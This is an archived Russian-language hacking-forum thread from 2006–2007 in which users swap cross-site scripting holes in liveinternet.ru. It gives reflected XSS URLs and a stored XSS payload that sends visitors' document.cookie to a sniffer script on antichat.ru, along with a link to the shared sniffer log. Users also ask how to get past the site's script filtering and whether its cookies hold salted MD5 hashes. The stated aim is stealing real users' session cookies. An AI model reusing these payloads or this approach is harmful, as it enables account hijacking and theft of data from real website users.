ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

28.12.2006, 19:55
|
|
Участник форума
Регистрация: 10.10.2006
Сообщений: 127
Провел на форуме: 483695
Репутация:
31
|
|
Не совсем понял за что "-", но больше вопросов подобного плана задавать не буду. Единственно хотелось бы узнать, что я нарушил.
во-первых посмотри название темы, то что ты написал не относится сюда.Есть вопрос, ищи, если такая тема есть, прочти, если нету, создай в соответствующем разделе и спроси.Разе непонятно почему "-"?Тоже самое относится и другому товарищу.Еще вопросы?С вами был m0nzt3r 
Последний раз редактировалось m0nzt3r; 28.12.2006 в 20:09..
|
|
|

13.01.2007, 22:22
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме: 7792614
Репутация:
1223
|
|
если не ошибаюсь пасивный xxs это тот каторый уже прикрыли, так зачем выкладывать его
если не прав объясните что значит пасивный.
пассивная, это когда жертва должна зайти по ссылке, которую ты дашь, чтоб хсс подействовала.Понятно?Мало флейми, устал посты стирать твои.. (m0nzt3r)
Последний раз редактировалось m0nzt3r; 14.01.2007 в 20:03..
|
|
|

27.02.2007, 22:03
|
|
Новичок
Регистрация: 17.11.2006
Сообщений: 3
Провел на форуме: 15887
Репутация:
0
|
|
ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
|
|
|

27.02.2007, 23:08
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
Сообщение от *D1VER
http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0
Пассивная ХSS почти там же!
Это другой серв....
__________________
|
|
|

27.02.2007, 23:28
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
2 re-arranged
http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=7 29772&userownid=undefined"><script>alert("xss")</script>
пассивная
|
|
|

01.03.2007, 00:39
|
|
Новичок
Регистрация: 05.05.2006
Сообщений: 5
Провел на форуме: 30199
Репутация:
0
|
|
Сообщение от InferNo23
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.
А что дальше делать?
Куки отправляются на снифф общий? если да, то я не могу найти его лог =/
Зы: или это уже вообще не катит?
Сообщение от re-arranged
ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
+1 =)
Последний раз редактировалось DeadFire; 01.03.2007 в 00:43..
|
|
|

01.03.2007, 06:18
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме: 6860213
Репутация:
378
|
|
Не прикрыли ничего, http://www.liveinternet.ru/users/nokia1/profile/ алерт есть..
2DeadFire лог теперь на old.antichat.ru
Код:
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Log: http://old.antichat.ru/sniff/log.php
|
|
|

03.03.2007, 15:44
|
|
Новичок
Регистрация: 05.05.2006
Сообщений: 5
Провел на форуме: 30199
Репутация:
0
|
|
Объясните плз для тупых что нужно сделать по шагам.
Зы: там скрипты отсеиваются
Зыы: я создал юзера ( Vasssssia) в поле краткая инфа запихал скрипт, ну собсно и в основную тоже, на сниф вообще ниче не приходит..
приходит, когда просто в дневник пихаешь "картинку", только толку от этого как от быка молока...
Зыыы: за лог спасибо
Последний раз редактировалось DeadFire; 03.03.2007 в 15:53..
|
|
|

08.03.2007, 23:02
|
|
Новичок
Регистрация: 17.11.2006
Сообщений: 3
Провел на форуме: 15887
Репутация:
0
|
|
2InferNo23 тысяча чертей, отсеиваются <script> </script>.
|
|
|

25.07.2007, 23:59
|
|
Познающий
Регистрация: 08.01.2006
Сообщений: 90
Провел на форуме: 1000758
Репутация:
16
|
|
я не любитель создавать темы изза небольших вопросов, поэтому спрошу тут. В куках лиру хранится чистый мд5 или соль?
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|